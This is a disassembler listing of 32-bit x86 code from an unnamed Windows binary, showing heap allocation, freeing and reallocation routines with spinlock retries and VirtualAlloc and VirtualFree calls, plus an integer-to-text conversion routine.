lea ecx, [edx+3]
mov [eax-4], ecx
mov [edx+eax-8], edx
call sub_40001510
jmp short loc_4000190D
; ---------------------------------------------------------------------------
loc_400018B8: ; CODE XREF: sub_40001734+112�j
movzx ecx, word ptr [ebx+18h]
mov edi, ds:dword_4001C720
cmp edi, ecx
jb short loc_400018EC
mov esi, ds:dword_4001C71C
movzx ecx, word ptr [ebx+1Ah]
lea edx, [ecx+0B30h]
cmp edi, edx
jb short loc_400018DC
mov edi, ecx
loc_400018DC: ; CODE XREF: sub_40001734+1A4�j
sub esi, edi
sub ds:dword_4001C720, edi
mov ds:dword_4001C71C, esi
jmp short loc_4000190D
; ---------------------------------------------------------------------------
loc_400018EC: ; CODE XREF: sub_40001734+190�j
movzx eax, word ptr [ebx+1Ah]
mov edi, eax
call sub_400015DC
mov esi, eax
test eax, eax
jnz short loc_4000190D
mov ds:byte_4001C718, al
mov [ebx], al
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001908: ; CODE XREF: sub_40001734+166�j
and byte ptr [edi+esi-4], 0F7h
loc_4000190D: ; CODE XREF: sub_40001734+182�j
; sub_40001734+1B6�j ...
lea ecx, [edi+6]
mov [esi-4], ecx
xor eax, eax
mov ds:byte_4001C718, al
mov [esi], ebx
mov [esi+8], eax
mov dword ptr [esi+0Ch], 1
mov [ebx+10h], esi
lea eax, [esi+20h]
movzx ecx, word ptr [ebx+2]
lea edx, [ecx+eax]
mov [ebx+8], edx
add edi, esi
sub edi, ecx
mov [ebx+0Ch], edi
mov byte ptr [ebx], 0
mov [eax-4], esi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001948: ; CODE XREF: sub_40001734+240�j
; sub_40001734+260�j
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001996
push 0
call sub_400012D4 ; Sleep
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001996
push 0Ah
call sub_400012D4 ; Sleep
jmp short loc_40001948
; ---------------------------------------------------------------------------
align 4
loc_40001978: ; CODE XREF: sub_40001734+12�j
cmp eax, 40A2Ch
ja loc_40001A90
lea ebx, [eax+0D3h]
and ebx, 0FFFFFF00h
add ebx, 30h
test cl, cl
jnz short loc_40001948
loc_40001996: ; CODE XREF: sub_40001734+221�j
; sub_40001734+237�j
lea edx, [ebx-0B30h]
mov ecx, edx
shr edx, 0Dh
shr ecx, 8
mov eax, 0FFFFFFFFh
shl eax, cl
and eax, ds:dword_4001C728[edx*4]
jz short loc_400019C0
and ecx, 0FFFFFFE0h
bsf eax, eax
or ecx, eax
jmp short loc_40001A1C
; ---------------------------------------------------------------------------
align 10h
loc_400019C0: ; CODE XREF: sub_40001734+27E�j
mov eax, 0FFFFFFFEh
mov ecx, edx
shl eax, cl
and eax, ds:dword_4001C724
jz short loc_400019E8
bsf edx, eax
mov eax, ds:dword_4001C728[edx*4]
bsf ecx, eax
mov eax, edx
shl eax, 5
or ecx, eax
jmp short loc_40001A1C
; ---------------------------------------------------------------------------
align 4
loc_400019E8: ; CODE XREF: sub_40001734+29B�j
mov ecx, ds:dword_4001C720
sub ecx, ebx
jb short loc_40001A0C
mov eax, ds:dword_4001C71C
sub eax, ebx
mov ds:dword_4001C71C, eax
mov ds:dword_4001C720, ecx
or ebx, 2
mov [eax-4], ebx
jmp short loc_40001A13
; ---------------------------------------------------------------------------
loc_40001A0C: ; CODE XREF: sub_40001734+2BC�j
mov eax, ebx
call sub_400015DC
loc_40001A13: ; CODE XREF: sub_40001734+2D6�j
mov ds:byte_4001C718, 0
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001A1C: ; CODE XREF: sub_40001734+288�j
; sub_40001734+2B1�j
push esi
push edi
lea edi, off_4001C7A8[ecx*8]
mov esi, [edi+4]
mov eax, [esi+4]
mov [edi+4], eax
mov [eax], edi
cmp edi, eax
jnz short loc_40001A4B
mov eax, 0FFFFFFFEh
rol eax, cl
and ds:dword_4001C728[edx*4], eax
jnz short loc_40001A4B
btr ds:dword_4001C724, edx
loc_40001A4B: ; CODE XREF: sub_40001734+2FE�j
; sub_40001734+30E�j
mov edi, 0FFFFFFF0h
and edi, [esi-4]
mov edx, edi
sub edx, ebx
jz short loc_40001A78
lea eax, [ebx+esi]
lea ecx, [edx+3]
mov [eax-4], ecx
mov [edx+eax-8], edx
cmp edx, 0B30h
jb short loc_40001A7D
call sub_40001510
jmp short loc_40001A7D
; ---------------------------------------------------------------------------
align 4
loc_40001A78: ; CODE XREF: sub_40001734+323�j
and byte ptr [edi+esi-4], 0F7h
loc_40001A7D: ; CODE XREF: sub_40001734+338�j
; sub_40001734+33F�j
lea ecx, [ebx+2]
mov [esi-4], ecx
mov ds:byte_4001C718, 0
mov eax, esi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001A90: ; CODE XREF: sub_40001734+249�j
pop ebx
test eax, eax
jns sub_40001694
xor eax, eax
retn
sub_40001734 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40001A9C proc near ; CODE XREF: sub_40001C7C+48�p
; sub_40001C7C+8C�p ...
mov edx, [eax-4]
test dl, 7
mov ecx, eax
push ebx
mov bl, ds:byte_4001C04D
jnz loc_40001B7C
test bl, bl
mov ebx, [edx]
jnz short loc_40001B18
loc_40001AB7: ; CODE XREF: sub_40001A9C+85�j
; sub_40001A9C+9B�j
sub dword ptr [edx+0Ch], 1
mov eax, [edx+8]
jz short loc_40001AEC
test eax, eax
mov [edx+8], ecx
lea eax, [eax+1]
mov [ecx-4], eax
jz short loc_40001AD4
xor eax, eax
mov [ebx], al
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001AD4: ; CODE XREF: sub_40001A9C+2F�j
mov ecx, [ebx+4]
mov [edx+14h], ebx
mov [edx+4], ecx
mov [ecx+14h], edx
mov [ebx+4], edx
mov byte ptr [ebx], 0
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001AEC: ; CODE XREF: sub_40001A9C+22�j
test eax, eax
jz short loc_40001B03
mov eax, [edx+14h]
mov ecx, [edx+4]
mov [eax+4], ecx
mov [ecx+14h], eax
xor eax, eax
cmp [ebx+10h], edx
jnz short loc_40001B06
loc_40001B03: ; CODE XREF: sub_40001A9C+52�j
mov [ebx+0Ch], eax
loc_40001B06: ; CODE XREF: sub_40001A9C+65�j
mov [ebx], al
mov eax, edx
mov edx, [edx-4]
mov bl, ds:byte_4001C04D
jmp short loc_40001B85
; ---------------------------------------------------------------------------
align 4
loc_40001B18: ; CODE XREF: sub_40001A9C+19�j
; sub_40001A9C+AC�j
mov eax, 100h
lock cmpxchg [ebx], ah
jz short loc_40001AB7
push ecx
push edx
push 0
call sub_400012D4 ; Sleep
pop edx
pop ecx
mov eax, 100h
lock cmpxchg [ebx], ah
jz loc_40001AB7
push ecx
push edx
push 0Ah
call sub_400012D4 ; Sleep
pop edx
pop ecx
jmp short loc_40001B18
; ---------------------------------------------------------------------------
align 4
loc_40001B4C: ; CODE XREF: sub_40001A9C+DC�j
; sub_40001A9C+F3�j
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001B91
push 0
call sub_400012D4 ; Sleep
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001B91
push 0Ah
call sub_400012D4 ; Sleep
jmp short loc_40001B4C
; ---------------------------------------------------------------------------
align 4
loc_40001B7C: ; CODE XREF: sub_40001A9C+F�j
test dl, 5
jnz loc_40001C6C
loc_40001B85: ; CODE XREF: sub_40001A9C+77�j
and edx, 0FFFFFFF0h
test bl, bl
mov ebx, edx
push esi
mov esi, eax
jnz short loc_40001B4C
loc_40001B91: ; CODE XREF: sub_40001A9C+BD�j
; sub_40001A9C+D3�j
test dword ptr [ebx+esi-4], 1
mov ecx, [ebx+esi-4]
jnz short loc_40001BD4
or ecx, 8
mov [ebx+esi-4], ecx
loc_40001BA6: ; CODE XREF: sub_40001A9C+146�j
; sub_40001A9C+14D�j
test byte ptr [esi-4], 8
jnz short loc_40001BEC
loc_40001BAC: ; CODE XREF: sub_40001A9C+15D�j
; sub_40001A9C+166�j
cmp ebx, 13FFF0h
jz short loc_40001C04
lea eax, [ebx+3]
mov [esi-4], eax
mov [ebx+esi-8], ebx
mov eax, esi
mov edx, ebx
call sub_40001510
mov ds:byte_4001C718, 0
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001BD4: ; CODE XREF: sub_40001A9C+101�j
lea eax, [ebx+esi]
and ecx, 0FFFFFFF0h
add ebx, ecx
cmp ecx, 0B30h
jb short loc_40001BA6
call sub_400014D0
jmp short loc_40001BA6
; ---------------------------------------------------------------------------
align 4
loc_40001BEC: ; CODE XREF: sub_40001A9C+10E�j
mov ecx, [esi-8]
sub esi, ecx
add ebx, ecx
cmp ecx, 0B30h
jb short loc_40001BAC
mov eax, esi
call sub_400014D0
jmp short loc_40001BAC
; ---------------------------------------------------------------------------
loc_40001C04: ; CODE XREF: sub_40001A9C+116�j
cmp ds:dword_4001C720, 13FFF0h
jnz short loc_40001C3C
sub esi, 10h
mov eax, [esi]
mov edx, [esi+4]
mov [eax+4], edx
mov [edx], eax
mov ds:byte_4001C718, 0
push 8000h
push 0
push esi
call sub_400012CC ; VirtualFree
cmp eax, 1
sbb eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001C3C: ; CODE XREF: sub_40001A9C+172�j
lea ebx, [esi+13FFF0h]
call sub_40001570
mov dword ptr [ebx-4], 2
mov ds:dword_4001C720, 13FFF0h
mov ds:dword_4001C71C, ebx
mov ds:byte_4001C718, 0
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001C6C: ; CODE XREF: sub_40001A9C+E3�j
pop ebx
test dl, 3
jz sub_400016F8
mov eax, 0FFFFFFFFh
retn
sub_40001A9C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40001C7C proc near ; CODE XREF: sub_40002C54+D�p
; DATA XREF: .data:off_4001A72C�o
mov ecx, [eax-4]
test cl, 7
push ebx
push esi
mov esi, eax
jnz loc_40001D14
mov ebx, [ecx]
movzx ecx, word ptr [ebx+2]
sub ecx, 4
cmp ecx, edx
jb short loc_40001CD0
lea ebx, ds:40h[edx*4]
cmp ebx, ecx
jb short loc_40001CA8
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001CA8: ; CODE XREF: sub_40001C7C+26�j
mov ebx, edx
mov eax, edx
call sub_40001734
test eax, eax
jz short loc_40001CCB
mov ecx, ebx
mov edx, eax
mov ebx, eax
mov eax, esi
call sub_400014B4
mov eax, esi
call sub_40001A9C
mov eax, ebx
loc_40001CCB: ; CODE XREF: sub_40001C7C+37�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 10h
loc_40001CD0: ; CODE XREF: sub_40001C7C+1B�j
lea ecx, [ecx+ecx+20h]
push edi
mov edi, edx
xor eax, eax
sub ecx, edx
adc eax, 0FFFFFFFFh
and eax, ecx
add eax, edx
call sub_40001734
test eax, eax
jz short loc_40001D0F
cmp edi, 40A2Ch
jbe short loc_40001CF6
mov [eax-8], edi
loc_40001CF6: ; CODE XREF: sub_40001C7C+75�j
movzx ecx, word ptr [ebx+2]
sub ecx, 4
mov edx, eax
mov edi, eax
mov eax, esi
call dword ptr [ebx+1Ch]
mov eax, esi
call sub_40001A9C
mov eax, edi
loc_40001D0F: ; CODE XREF: sub_40001C7C+6D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001D14: ; CODE XREF: sub_40001C7C+A�j
test cl, 5
jnz loc_40001F68
mov ebx, ecx
and ecx, 0FFFFFFF0h
push edi
lea edi, [ecx+eax]
sub ecx, 4
and ebx, 0Fh
cmp edx, ecx
push ebp
ja loc_40001E34
lea ebp, [edx+edx]
cmp ebp, ecx
jb short loc_40001D44
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001D44: ; CODE XREF: sub_40001C7C+BE�j
cmp edx, 0B2Ch
jnb short loc_40001D5D
cmp ebp, 0B2Ch
jb loc_40001E0C
mov edx, 0B2Ch
loc_40001D5D: ; CODE XREF: sub_40001C7C+CE�j
lea ebp, [edx+0D3h]
and ebp, 0FFFFFF00h
add ebp, 30h
add ecx, 4
sub ecx, ebp
cmp ds:byte_4001C04D, 0
jz short loc_40001DB4
loc_40001D7A: ; CODE XREF: sub_40001C7C+12E�j
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001DAC
push ecx
push 0
call sub_400012D4 ; Sleep
pop ecx
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001DAC
push ecx
push 0Ah
call sub_400012D4 ; Sleep
pop ecx
jmp short loc_40001D7A
; ---------------------------------------------------------------------------
loc_40001DAC: ; CODE XREF: sub_40001C7C+10B�j
; sub_40001C7C+123�j
mov ebx, 0Fh
and ebx, [esi-4]
loc_40001DB4: ; CODE XREF: sub_40001C7C+FC�j
or ebx, ebp
mov [esi-4], ebx
mov ebx, ecx
mov edx, [edi-4]
test dl, 1
jnz short loc_40001DCC
or edx, 8
mov [edi-4], edx
jmp short loc_40001DE2
; ---------------------------------------------------------------------------
align 4
loc_40001DCC: ; CODE XREF: sub_40001C7C+145�j
mov eax, edi
and edx, 0FFFFFFF0h
add ebx, edx
add edi, edx
cmp edx, 0B30h
jb short loc_40001DE2
call sub_400014D0
loc_40001DE2: ; CODE XREF: sub_40001C7C+14D�j
; sub_40001C7C+15F�j
mov [edi-8], ebx
lea eax, [ebx+3]
mov [esi+ebp-4], eax
cmp ebx, 0B30h
jb short loc_40001DFE
lea eax, [esi+ebp]
mov edx, ebx
call sub_40001510
loc_40001DFE: ; CODE XREF: sub_40001C7C+176�j
mov ds:byte_4001C718, 0
mov eax, esi
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001E0C: ; CODE XREF: sub_40001C7C+D6�j
mov edi, edx
mov eax, edx
call sub_40001734
test eax, eax
jz short loc_40001E2F
mov ebp, eax
mov edx, eax
mov eax, esi
mov ecx, edi
call sub_400014B4
mov eax, esi
call sub_40001A9C
mov eax, ebp
loc_40001E2F: ; CODE XREF: sub_40001C7C+19B�j
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001E34: ; CODE XREF: sub_40001C7C+B3�j
mov eax, [edi-4]
test al, 1
jz loc_40001F20
and eax, 0FFFFFFF0h
lea ebp, [ecx+eax]
cmp edx, ebp
ja loc_40001F20
cmp ds:byte_4001C04D, 0
jz short loc_40001EA5
loc_40001E56: ; CODE XREF: sub_40001C7C+20E�j
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001E8C
push ecx
push edx
push 0
call sub_400012D4 ; Sleep
pop edx
pop ecx
mov eax, 100h
lock cmpxchg ds:byte_4001C718, ah
jz short loc_40001E8C
push ecx
push edx
push 0Ah
call sub_400012D4 ; Sleep
pop edx
pop ecx
jmp short loc_40001E56
; ---------------------------------------------------------------------------
loc_40001E8C: ; CODE XREF: sub_40001C7C+1E7�j
; sub_40001C7C+201�j
mov ebx, 0Fh
and ebx, [esi-4]
mov eax, [edi-4]
test al, 1
jz short loc_40001F19
and eax, 0FFFFFFF0h
lea ebp, [ecx+eax]
cmp edx, ebp
ja short loc_40001F19
loc_40001EA5: ; CODE XREF: sub_40001C7C+1D8�j
cmp eax, 0B30h
jb short loc_40001EB7
mov eax, edi
push ecx
push edx
call sub_400014D0
pop edx
pop ecx
loc_40001EB7: ; CODE XREF: sub_40001C7C+22E�j
mov eax, ecx
shr eax, 2
add eax, ecx
xor edi, edi
sub eax, edx
adc edi, 0FFFFFFFFh
and eax, edi
lea eax, [edx+eax+0D3h]
and eax, 0FFFFFF00h
add eax, 30h
lea edx, [ebp+4]
sub edx, eax
ja short loc_40001EE8
and dword ptr [esi+ebp], 0FFFFFFF7h
add ebp, 4
jmp short loc_40001F04
; ---------------------------------------------------------------------------
align 4
loc_40001EE8: ; CODE XREF: sub_40001C7C+25F�j
mov [esi+ebp-4], edx
lea edi, [edx+3]
mov [eax+esi-4], edi
mov ebp, eax
cmp edx, 0B30h
jb short loc_40001F04
add eax, esi
call sub_40001510
loc_40001F04: ; CODE XREF: sub_40001C7C+268�j
; sub_40001C7C+27F�j
or ebp, ebx
mov [esi-4], ebp
mov ds:byte_4001C718, 0
mov eax, esi
loc_40001F12: ; CODE XREF: sub_40001C7C+2C3�j
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_40001F19: ; CODE XREF: sub_40001C7C+21D�j
; sub_40001C7C+227�j
mov ds:byte_4001C718, 0
loc_40001F20: ; CODE XREF: sub_40001C7C+1BD�j
; sub_40001C7C+1CB�j
mov eax, ecx
shr eax, 2
add eax, ecx
xor edi, edi
sub eax, edx
adc edi, 0FFFFFFFFh
and eax, edi
add eax, edx
mov ebp, eax
mov edi, ecx
push edx
call sub_40001734
pop edx
test eax, eax
jz short loc_40001F12
cmp ebp, 40A2Ch
jbe short loc_40001F4C
mov [eax-8], edx
loc_40001F4C: ; CODE XREF: sub_40001C7C+2CB�j
mov ebp, eax
mov edx, eax
mov eax, esi
mov ecx, edi
call sub_40001484
mov eax, esi
call sub_40001A9C
mov eax, ebp
pop ebp
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001F68: ; CODE XREF: sub_40001C7C+9B�j
test cl, 3
jnz loc_40001FFC
sub ecx, 18h
cmp edx, ecx
jbe short loc_40001FBC
mov eax, ecx
shr ecx, 2
add ecx, eax
xor eax, eax
sub ecx, edx
adc eax, 0FFFFFFFFh
and eax, ecx
add eax, edx
mov ebx, eax
push edx
call sub_40001734
pop edx
test eax, eax
jz short loc_40001FB9
cmp ebx, 40A2Ch
jbe short loc_40001FA2
mov [eax-8], edx
loc_40001FA2: ; CODE XREF: sub_40001C7C+321�j
mov ecx, [esi-8]
mov ebx, eax
mov edx, eax
mov eax, esi
call sub_40001484
mov eax, esi
call sub_40001A9C
mov eax, ebx
loc_40001FB9: ; CODE XREF: sub_40001C7C+319�j
; sub_40001C7C+357�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001FBC: ; CODE XREF: sub_40001C7C+2FA�j
shr ecx, 1
cmp edx, ecx
jb short loc_40001FC8
mov [eax-8], edx
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40001FC8: ; CODE XREF: sub_40001C7C+344�j
mov ebx, edx
mov eax, edx
call sub_40001734
test eax, eax
jz short loc_40001FB9
cmp ebx, 40A2Ch
jbe short loc_40001FE0
mov [eax-8], ebx
loc_40001FE0: ; CODE XREF: sub_40001C7C+35F�j
mov ecx, ebx
mov ebx, eax
mov edx, eax
mov eax, esi
call sub_400014B4
mov eax, esi
call sub_40001A9C
mov eax, ebx
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
loc_40001FFC: ; CODE XREF: sub_40001C7C+2EF�j
xor eax, eax
pop esi
pop ebx
retn
sub_40001C7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002004 proc near ; CODE XREF: sub_40002C08+4�p
; DATA XREF: .data:off_4001A730�o
push ebx
lea ebx, [eax-1]
and ebx, 0FFFFFFFCh
call sub_40001734
cmp eax, 1
sbb ecx, ecx
lea edx, [ebx+eax]
or ebx, ecx
cmp ebx, 40A2Ch
jnb short loc_40002032
neg ebx
fldz
loc_40002026: ; CODE XREF: sub_40002004+28�j
fst qword ptr [ebx+edx]
add ebx, 8
js short loc_40002026
mov [edx], ecx
ffree st
loc_40002032: ; CODE XREF: sub_40002004+1C�j
pop ebx
retn
sub_40002004 endp
; =============== S U B R O U T I N E =======================================
sub_40002034 proc near ; CODE XREF: sub_40002540+D1�p
mov ecx, eax
mov edx, ecx
sub edx, 4
mov edx, [edx]
and edx, 0FFFFFFF0h
add edx, ecx
mov eax, edx
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 0FFFFFFF0h
test edx, edx
jnz short locret_40002054
xor eax, eax
locret_40002054: ; CODE XREF: sub_40002034+1C�j
retn
sub_40002034 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002058 proc near ; CODE XREF: sub_40002540+5F�p
cmp ds:dword_4001C720, 0
jz short loc_4000207B
mov edx, ds:dword_4001C71C
cmp edx, eax
jb short loc_4000207B
mov edx, eax
add edx, 140000h
cmp edx, ds:dword_4001C71C
jnb short loc_4000207F
loc_4000207B: ; CODE XREF: sub_40002058+7�j
; sub_40002058+11�j
add eax, 10h
retn
; ---------------------------------------------------------------------------
loc_4000207F: ; CODE XREF: sub_40002058+21�j
cmp ds:dword_4001C720, 13FFF0h
jz short loc_40002092
mov eax, ds:dword_4001C71C
jmp short locret_40002094
; ---------------------------------------------------------------------------
loc_40002092: ; CODE XREF: sub_40002058+31�j
xor eax, eax
locret_40002094: ; CODE XREF: sub_40002058+38�j
retn
sub_40002058 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40002098 proc near ; CODE XREF: sub_400023F4+30�p
push ebx
push esi
mov ebx, eax
add ebx, 20h
mov [edx], ebx
mov edx, [eax]
cmp eax, [edx+10h]
jnz short loc_400020B0
mov ebx, [edx+8]
cmp ebx, [edx+0Ch]
jbe short loc_400020C9
loc_400020B0: ; CODE XREF: sub_40002098+E�j
mov esi, eax
mov ebx, esi
sub ebx, 4
mov ebx, [ebx]
and ebx, 0FFFFFFF0h
add ebx, esi
movzx eax, word ptr [edx+2]
sub ebx, eax
mov [ecx], ebx
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_400020C9: ; CODE XREF: sub_40002098+16�j
mov eax, [edx+8]
dec eax
mov [ecx], eax
pop esi
pop ebx
retn
sub_40002098 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_400020D4 proc near ; CODE XREF: sub_40002540+20B�p
; sub_40002540+226�p ...
push edi
mov edi, edx
add eax, 1
mov edx, 89705F41h
mul edx
shr eax, 1Eh
mov ecx, edx
and edx, 1FFFFFFFh
shr ecx, 1Dh
lea edx, [edx+edx*4]
add edx, eax
mov eax, ecx
or eax, 30h
mov [edi], al
mov eax, edx
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 1Ch
and edx, 0FFFFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 1Bh
and edx, 7FFFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 1Ah
and edx, 3FFFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 19h
and edx, 1FFFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 18h
and edx, 0FFFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 17h
and edx, 7FFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 16h
and edx, 3FFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
lea edx, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 15h
and edx, 1FFFFFh
or ecx, eax
or eax, 30h
mov [edi], al
lea eax, [edx+edx*4]
cmp ecx, 1
sbb edi, 0FFFFFFFFh
shr eax, 14h
or eax, 30h
mov [edi], al
lea eax, [edi+1]
pop edi
retn
sub_400020D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400021F0 proc near ; CODE XREF: sub_40002540+16A�p
; sub_40002540+1E3�p ...
push ebx
push esi
mov esi, ecx
mov ebx, edx
mov edx, ebx
mov ecx, esi
call sub_40002DFC
mov eax, ebx
add eax, esi
pop esi
pop ebx
retn
sub_400021F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40002208 proc near ; CODE XREF: sub_40002208+A1�p
; sub_400022C0+1B�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
mov esi, edx
mov ebx, eax
mov edx, ebx
mov ecx, edx
add ecx, 0FFFFFFB4h
mov eax, [ebp+arg_0]
mov eax, [eax-1Ch]
cmp ecx, eax
jb short loc_40002232
mov ecx, [ebp+arg_0]
mov ecx, [ebp+arg_0]
add eax, [ecx-10h]
add edx, 0FFFFFFDFh
cmp eax, edx
jnb short loc_40002246
loc_40002232: ; CODE XREF: sub_40002208+18�j
push 1Ch
mov eax, [ebp+arg_0]
add eax, 0FFFFFFE4h
push eax
mov eax, ebx
add eax, 0FFFFFFB4h
push eax
call sub_40001258 ; VirtualQuery
loc_40002246: ; CODE XREF: sub_40002208+28�j
cmp esi, 3E8h
jge short loc_4000228A
mov eax, [ebp+arg_0]
mov eax, [eax-1Ch]
mov edx, [ebp+arg_0]
add eax, [edx-10h]
mov edx, ebx
add edx, 0FFFFFFDFh
cmp eax, edx
jbe short loc_4000228A
mov eax, [ebp+arg_0]
cmp dword ptr [eax-0Ch], 1000h
jnz short loc_4000228A
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 0E6h
jz short loc_4000228A
mov eax, [ebp+arg_0]
test byte ptr [eax-7], 1
jnz short loc_4000228A
mov eax, ebx
add eax, 0FFFFFFB4h
cmp ebx, [eax]
jz short loc_4000228E
loc_4000228A: ; CODE XREF: sub_40002208+44�j
; sub_40002208+59�j ...
xor eax, eax
jmp short loc_40002290
; ---------------------------------------------------------------------------
loc_4000228E: ; CODE XREF: sub_40002208+80�j
mov al, 1
loc_40002290: ; CODE XREF: sub_40002208+84�j
test al, al
jz short loc_400022B9
add ebx, 0FFFFFFDCh
mov ebx, [ebx]
test ebx, ebx
jz short loc_400022B7
mov eax, [ebp+arg_0]
push eax
lea edx, [esi+1]
mov eax, ebx
sub eax, 0FFFFFFB4h
call sub_40002208
pop ecx
test al, al
jnz short loc_400022B7
xor eax, eax
jmp short loc_400022B9
; ---------------------------------------------------------------------------
loc_400022B7: ; CODE XREF: sub_40002208+93�j
; sub_40002208+A9�j
mov al, 1
loc_400022B9: ; CODE XREF: sub_40002208+8A�j
; sub_40002208+AD�j
pop esi
pop ebx
pop ebp
retn
sub_40002208 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400022C0 proc near ; CODE XREF: sub_400023F4+68�p
var_10 = dword ptr -10h
push ebp
mov ebp, esp
add esp, 0FFFFFFE4h
push ebx
mov ebx, [eax]
xor eax, eax
mov [ebp+var_10], eax
cmp ebx, 10000h
jb short loc_400022E5
push ebp
xor edx, edx
mov eax, ebx
call sub_40002208
pop ecx
test al, al
jnz short loc_400022E7
loc_400022E5: ; CODE XREF: sub_400022C0+14�j
xor ebx, ebx
loc_400022E7: ; CODE XREF: sub_400022C0+23�j
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_400022C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_400022F0 proc near ; CODE XREF: sub_4000235C+3�p
; sub_4000239C+11�p
cmp ds:byte_4001C04D, 0
jz short loc_4000232D
jmp short loc_4000231B
; ---------------------------------------------------------------------------
loc_400022FB: ; CODE XREF: sub_400022F0+3B�j
push 0
call sub_400012D4 ; Sleep
mov ecx, offset byte_4001E7C0
mov dl, 1
xor eax, eax
call sub_40001344
test al, al
jz short loc_4000232D
push 0Ah
call sub_400012D4 ; Sleep
loc_4000231B: ; CODE XREF: sub_400022F0+9�j
mov ecx, offset byte_4001E7C0
mov dl, 1
xor eax, eax
call sub_40001344
test al, al
jnz short loc_400022FB
loc_4000232D: ; CODE XREF: sub_400022F0+7�j
; sub_400022F0+22�j
cmp ds:dword_4001E7BC, 0
jnz short loc_4000234E
push 4
push 1000h
push 10000h
push 0
call sub_400012C4 ; VirtualAlloc
mov ds:dword_4001E7BC, eax
loc_4000234E: ; CODE XREF: sub_400022F0+44�j
cmp ds:dword_4001E7BC, 0
setnz al
retn
sub_400022F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000235C proc near ; DATA XREF: .data:4001A734�o
push ebx
mov ebx, eax
call sub_400022F0
test al, al
jz short loc_40002391
mov eax, ds:dword_4001E7BC
cmp dword ptr [eax], 3FFEh
jge short loc_40002391
mov eax, ds:dword_4001E7BC
mov eax, [eax]
mov edx, ds:dword_4001E7BC
mov [edx+eax*4+4], ebx
mov eax, ds:dword_4001E7BC
inc dword ptr [eax]
mov al, 1
jmp short loc_40002393
; ---------------------------------------------------------------------------
loc_40002391: ; CODE XREF: sub_4000235C+A�j
; sub_4000235C+17�j
xor eax, eax
loc_40002393: ; CODE XREF: sub_4000235C+33�j
mov ds:byte_4001E7C0, 0
pop ebx
retn
sub_4000235C endp
